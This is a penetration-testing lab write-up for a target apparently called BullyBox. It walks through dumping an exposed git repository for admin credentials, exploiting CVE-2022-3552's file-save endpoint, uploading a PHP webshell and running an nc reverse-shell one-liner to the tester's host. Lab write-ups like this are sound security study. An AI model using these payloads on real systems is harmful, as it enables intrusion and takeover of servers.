Target IP: 192.168.250.27
Challenge Description: N/A.
There are two TCP ports open on the target machine: SSH and HTTP, as shown above.
Performing an aggressive port scan against the two TCP ports returns the result above. I will start enumeration with the web application on port 80. After rescanning the target machine, I managed to find out more information about the target machine: it has a git repository!
Port 80: HTTP
I tried to browse to http://192.168.250.27 on my machine. However, I was presented the VHOST name bullybox.local. I added this VHOST name in my /etc/hosts file. Now my /etc/hosts contains the entry above in the image.
Now the webpage above is displayed after making the changes to my /etc/hosts file. I tried default credentials, but I had no luck.
Doing a source-code scan shows the application version is 4.22.1.5, as shown above.
I registered an account, but I did not find anything useful. I will need to obtain the admin account. Maybe the git repository contains sensitive data?
Browsing to http://bullybox.local/.git displays the webpage above. Apparently I do not have access to the resource. But from previous knowledge, I know it is possible to bypass this using tools such as git-dumper.
Using git-dumper, I dumped the contents of the git repository in a directory called dumped.
The tool successfully managed to dump 611 directories and 3497 files as shown above.
Checking the HEAD shows the important information above. The admin's name is Yuki and their email address is admin@bullybox.local as shown above.
The file bb-config.php contains the credentials of the user admin shown above. The credentials admin:Playing-Unstylish7-Provided is interesting. Also, in the image above, the /bb-admin sounds like the admin panel.
Browsing to http://bullybox.local/bb-admin displays the webpage above. At the bottom of the webpage, the version 4.22.1.5 of the application is also specified.
And bingo! Using the credentials admin:Playing-Unstylish7-Provided works! Now I have access to the web application as the admin user as shown above. Now I have the admin credentials and the verified application version, time to search for any vulnerabillities.
The application seems to be vulnerable to RCE as shown above. It has the CVE of CVE-2022-3552.
I found the PoC above for this exploit. I tried this exploit against the target machine.
I made a POST request to /api/admin/Filemanager/save_file with the value order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f> and obtained the result true as shown above. It looks like the file was uploaded with the name ax.php at the current working directory.
Now browsing to ax.php works as the phpinfo.php page is shown, as shown above. Time to upload a webshell.
I uploaded the URL-encoded PHP webshell <%3fphp+echo+system($_GET['cmd'])%3b%3f>. I named this file as shell.php. This was uploaded successfully as shown above.
And I can access my PHP webshell at http://bullybox.local/shell.php. I issued the commands id;whoami;ls and received the output above. The commands were executed successfully. Time to obtain a reverse shell connection now.
I started a listener on my machine at port 80. Then using the PHP webshell, I deployed the URL-encoded nc reverse shell code rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20192.168.45.176%2080%20%3E%2Ftmp%2Ff. And now I have a reverse shell connection on my machine at port 80 with the session as the user yuki as shown above. Now I have a foothold on the target machine.
I tried to find the local.txt flag, but there was none. Running sudo -l shows all commands can be executed as root. To spawn a root shell, I entered the command sudo bash. It seems like this machine only has proof.txt flag. And this flag is shown above. I was able to read this after spawning a root shell.